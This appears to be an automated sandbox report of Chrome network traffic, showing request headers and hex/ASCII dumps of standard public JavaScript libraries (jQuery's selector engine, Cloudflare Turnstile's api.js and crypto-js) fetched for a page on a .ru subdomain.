                            2024-12-18 20:05:32 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                            2024-12-18 20:05:32 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                            2024-12-18 20:05:32 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                            2024-12-18 20:05:32 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.449748104.18.94.414433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:33 UTC649OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://vcya.warmickmak.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:34 UTC471INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:33 GMT
                            Content-Type: application/javascript; charset=UTF-8
                            Content-Length: 47692
                            Connection: close
                            accept-ranges: bytes
                            last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                            access-control-allow-origin: *
                            cross-origin-resource-policy: cross-origin
                            Server: cloudflare
                            CF-RAY: 8f41c4b6ecd98c18-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 20:05:34 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                            2024-12-18 20:05:34 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                            2024-12-18 20:05:34 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                            2024-12-18 20:05:34 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                            2024-12-18 20:05:34 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                            2024-12-18 20:05:34 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                            Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                            2024-12-18 20:05:34 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                            Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                            2024-12-18 20:05:34 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                            Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                            2024-12-18 20:05:34 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                            Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                            2024-12-18 20:05:34 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                            Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.449749104.17.25.144433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:33 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                            Host: cdnjs.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:34 UTC950INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:34 GMT
                            Content-Type: application/javascript; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=30672000
                            ETag: W/"61182885-40eb"
                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                            cf-cdnjs-via: cfworker/kv
                            Cross-Origin-Resource-Policy: cross-origin
                            Timing-Allow-Origin: *
                            X-Content-Type-Options: nosniff
                            CF-Cache-Status: HIT
                            Age: 8189
                            Expires: Mon, 08 Dec 2025 20:05:34 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7jykI3Z5AtD3YlWQuFDm0K7wkTe3DXbKAWb6DIpg7A9KiyuNOLMuw0jNssBDTONPILfejsaESLylSrs22rl7bkk7o4a86JFSKAcZxFPxyt16llNU41QlAHfSzU3oSbtuBURCzU6"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                            Strict-Transport-Security: max-age=15780000
                            Server: cloudflare
                            CF-RAY: 8f41c4b8ccf3c472-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 20:05:34 UTC419INData Raw: 37 62 66 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                            Data Ascii: 7bfb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                            2024-12-18 20:05:34 UTC1369INData Raw: 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63
                            Data Ascii: his&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||func
                            2024-12-18 20:05:34 UTC1369INData Raw: 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75
                            Data Ascii: );return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{retu
